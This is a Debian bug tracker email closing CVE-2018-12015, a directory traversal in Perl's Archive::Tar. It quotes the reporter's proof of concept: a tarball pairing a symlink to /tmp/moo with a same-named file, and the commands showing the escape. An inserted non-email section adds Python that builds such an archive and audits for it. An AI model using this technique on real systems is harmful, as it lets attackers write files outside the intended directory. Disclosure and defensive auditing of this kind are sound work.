Your message dated Sat, 09 Jun 2018 15:08:26 +0000
with message-id <[email protected]>
and subject line Bug#900834: fixed in perl 5.26.2-6
has caused the Debian Bug report #900834,
regarding perl: CVE-2018-12015: Archive::Tar: directory traversal
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
900834: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=900834
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Source: perl
Version: 5.26.2-5
Tags: security
By default, the Archive::Tar module doesn't allow extracting files
outside the current working directory. However, you can bypass this
secure extraction mode easily by putting a symlink and a regular file
with the same name into the tarball.
I've attached a proof-of-concept tarball, which makes Archive::Tar create
/tmp/moo, regardless of what the current working directory is:
$ tar -tvvf traversal.tar.gz
lrwxrwxrwx root/root 0 2018-06-05 18:55 moo -> /tmp/moo
-rw-r--r-- root/root 4 2018-06-05 18:55 moo
$ pwd
/home/jwilk
$ ls /tmp/moo
ls: cannot access '/tmp/moo': No such file or directory
$ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")'
$ ls /tmp/moo
/tmp/moo
--
Jakub Wilk
traversal.tar.gz
Description: application/gzip
--- End Message ---
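The bypass described in the report relies on two archive members sharing one name: a symlink pointing outside the extraction directory, followed by a regular file that is written through that link. As an added example (not the reporter's attachment, and not code from perl or Archive::Tar), the Python below builds such an archive in memory from constructed sample data and audits it before extraction, flagging the symlink-then-file collision together with the broader cases a pre-extraction check should cover: absolute member names, `..` components, and symlink targets that resolve outside the destination. The `dest` directory and the member names are assumptions for the example.

```python
import io
import posixpath
import tarfile


def build_archive(members):
    """Build a gzip-compressed tar archive in memory.

    members: list of (name, kind, payload) where kind is "file" (payload is
    bytes) or "symlink" (payload is the link target). Constructed sample
    data for this example, not the reporter's attachment.
    """
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, kind, payload in members:
            info = tarfile.TarInfo(name)
            if kind == "symlink":
                info.type = tarfile.SYMTYPE
                info.linkname = payload
                tar.addfile(info)
            else:
                info.size = len(payload)
                tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def build_sample_archive():
    """The shape the report describes: symlink 'moo' -> /tmp/moo, then a
    regular file also named 'moo'."""
    return build_archive([
        ("moo", "symlink", "/tmp/moo"),
        ("moo", "file", b"moo\n"),
    ])


def audit_archive(data, dest="/extract"):
    """Return (member name, reason) findings for entries that could write
    outside `dest` if the archive were extracted naively.

    dest is the intended extraction directory (assumed absolute, POSIX).
    """
    findings = []
    seen_symlinks = {}  # normalized member name -> link target
    dest = posixpath.normpath(dest)
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for m in tar:
            name = posixpath.normpath(m.name)
            # Absolute names or leading '..' escape dest on their own.
            if name.startswith("/") or name.split("/")[0] == "..":
                findings.append((m.name, "path escapes destination"))
                continue
            if m.issym():
                target = m.linkname
                # Resolve the target from the directory the link lives in.
                if target.startswith("/"):
                    resolved = posixpath.normpath(target)
                else:
                    resolved = posixpath.normpath(
                        posixpath.join(dest, posixpath.dirname(name), target))
                if resolved != dest and not resolved.startswith(dest + "/"):
                    findings.append(
                        (m.name, f"link target outside destination: {target}"))
                seen_symlinks[name] = target
            elif name in seen_symlinks:
                # A later entry with a symlink's name is written through the
                # link by extractors that do not unlink first: the report's case.
                findings.append(
                    (m.name,
                     f"entry reuses earlier symlink name (-> {seen_symlinks[name]})"))
    return findings


if __name__ == "__main__":
    for member, reason in audit_archive(build_sample_archive()):
        print(f"{member}: {reason}")
```

Running the block prints two findings for the sample archive: the absolute link target and the regular file reusing the symlink's name. An audit like this belongs before extraction, and an extractor should additionally refuse to follow an existing symlink when writing a member, which is what the fix in 5.26.2-6 addresses on the Archive::Tar side.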
--- Begin Message ---
Source: perl
Source-Version: 5.26.2-6
We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Dominic Hargreaves <[email protected]> (supplier of updated perl package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Sat, 09 Jun 2018 13:38:44 +0100
Source: perl
Binary: perl-base perl-doc perl-debug libperl5.26 libperl-dev perl-modules-5.26
perl
Architecture: source
Version: 5.26.2-6
Distribution: unstable
Urgency: high
Maintainer: Niko Tyni <[email protected]>
Changed-By: Dominic Hargreaves <[email protected]>
Description:
libperl-dev - Perl library: development files
libperl5.26 - shared Perl library
perl - Larry Wall's Practical Extraction and Report Language
perl-base - minimal Perl system
perl-debug - debug-enabled Perl interpreter
perl-doc - Perl documentation
perl-modules-5.26 - Core Perl modules
Closes: 900834
Changes:
perl (5.26.2-6) unstable; urgency=high
.
* [SECURITY] CVE-2018-12015: fix directory traversal vulnerability
in Archive-Tar (Closes: #900834)
Checksums-Sha1:
04a71eff631df54db5286fcbac58fc1ad7977c1d 2776 perl_5.26.2-6.dsc
ebfd67b4bc36c0f89ed8a35af1a7cc5da76db7d3 167332 perl_5.26.2-6.debian.tar.xz
9f080dfd0f0864a9c1e4df57f13f8433735e1186 5184 perl_5.26.2-6_source.buildinfo
Checksums-Sha256:
8441ca46715247218cbc19cabd15126f4fbacd544b6ce6446ea7b2ba2541f16a 2776 perl_5.26.2-6.dsc
6b3a39b03e80498d7e0d02c544aa24d4d9fdfc4afd85a91375aa2685d882d178 167332 perl_5.26.2-6.debian.tar.xz
fd71e724ea48b4828c48af7104453780dc188328bcadeb7cf9593550bb14972f 5184 perl_5.26.2-6_source.buildinfo
Files:
99abfe79c6f0498735dc71dcdaf79714 2776 perl standard perl_5.26.2-6.dsc
87a276b0bb1e43151a0e6490f130b22d 167332 perl standard perl_5.26.2-6.debian.tar.xz
cb2a35df5f798150482b957eb6eeedf7 5184 perl standard perl_5.26.2-6_source.buildinfo
-----BEGIN PGP SIGNATURE-----
iQJBBAEBCAArFiEEy0llJ/kAnyscGnbawAV+cU1pT7IFAlsb3zUNHGRvbUBlYXJ0
aC5saQAKCRDABX5xTWlPstsOD/9zRnfCTFseLXuoSG2rVhRTuKagm234vLJ0LXTY
Y0g2Ol7Ayw8ABgyifYWqJDFs3WL70xWKdB3eLYsCSQD6jOPbSoTK1UjsavxD7tFG
bk72lVaDF8bSam/KEBIH67Ysb5/Y1tfBz3aWVE5z2fTOTbNDcph0cgvOfJ0SnU5h
3PF1FnZBJ91jpW279AIlbv+s4JbQZXXt9eUiZKT6WZnX5dOoEYTPG1Ky/ttwZFXv
ZA6xlTe+pyTaKvlQHOnKv76i8vWm6geQNzYMTde/tUqWv2a72Oq/HTcb7PiBYT/7
0JsdN2rWgq1tpTqAQ51MSZM3RkOZlgzT+J43iO9mxat6okzgORbyqEPwABbKXopd
L90PdvWoapLQFjrx5mQgZV+nyO8WhLXOKWir0zpOAZ/CjOhh249GdJaLplGOn11u
IAp8POD4or67dZxRro1x7YdkTV8GX6vkhWtEcKr7CnTRCDeNhe9jD8QUSClqN+a/
G1dAo7gaOrEBSCwdyWOiSQmmZyFykWCOPjl3/HiHFaC5t8C+SP64Qc+U0UzTa28/
u8uvUZ0uekSt+KGScXVP7jsVt1i8AQP/xTCCynsCdmOYpiLoJ793FyG0+VB1lnYz
8uRnHqBqcdizIZMnXUWnfvxV0AGLzMB3RCQLOZhdD8tipnsSJIsOZ12eMPcYFC6H
gJCkzA==
=OI+z
-----END PGP SIGNATURE-----
--- End Message ---